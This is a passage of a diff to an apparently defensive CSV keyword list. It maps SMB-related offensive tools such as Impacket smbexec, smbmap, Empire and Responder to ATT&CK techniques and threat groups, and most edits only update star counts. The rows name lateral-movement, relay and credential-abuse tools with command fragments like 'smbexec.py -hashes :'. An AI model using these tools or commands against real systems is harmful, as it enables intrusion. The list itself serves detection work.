-"*smbeagle_*_linux_amd64.zip*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","650","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" -"*smbeagle_*_linux_arm64.zip*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","650","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" -"*smbeagle_*_win_x64.zip*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","650","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"*SMBeagle.exe*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"*SMBeagle.sln*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"*smbeagle_*_linux_amd64.zip*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"*smbeagle_*_linux_arm64.zip*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"*smbeagle_*_win_x64.zip*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" "*smbenum.run*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","0","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*SMBetray*","offensive_tool_keyword","SMBetray","PoC to demonstrate the ability of an attacker to intercept and modify insecure SMB connections. as well as compromise some secured SMB connections if credentials are known.","T1557 - T1562 - T1553 - T1213","TA0002 - TA0008 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/quickbreach/SMBetray","1","1","N/A","N/A","4","382","97","2018-08-17T00:45:05Z","2018-08-12T00:38:02Z" -"*-SMBExec*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SMBExec.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*-SMBExec*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SMBExec.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*smbexec.py -hashes :*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*smbexec.py -share*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*smbexec.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*smbexec.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*SMBGhost.pcap*","offensive_tool_keyword","SMBGhost","Simple scanner for CVE-2020-0796 - SMBv3 RCE.","T1210 - T1573 - T1553 - T1216 - T1027","TA0006 - TA0011 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ollypwn/SMBGhost","1","1","N/A","N/A","7","647","206","2020-10-01T08:36:29Z","2020-03-11T15:21:27Z" -"*smbmap -*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1554","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*smbmap -*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" "*smbmap -u guest -H *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*smbmap.py *","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","1","N/A","10","10","1554","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" -"*smbmap.smbmap*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1554","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" -"*smbmapDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*smbmap-master*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","1","N/A","10","10","1554","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" -"*SMBNTLMChallenge*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*SMBNTLMChallenge*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*SMBNTLMResponse*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*smbmap.py *","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","1","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*smbmap.smbmap*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*smbmapDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*smbmap-master*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","1","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*SMBNTLMChallenge*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SMBNTLMChallenge*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SMBNTLMResponse*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*smbpasswd.py -newpass *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*smbpasswd.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*SMBRelay.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" -"*SMBRelayChallenge*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*smbpasswd.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*SMBRelay.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*SMBRelayChallenge*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure 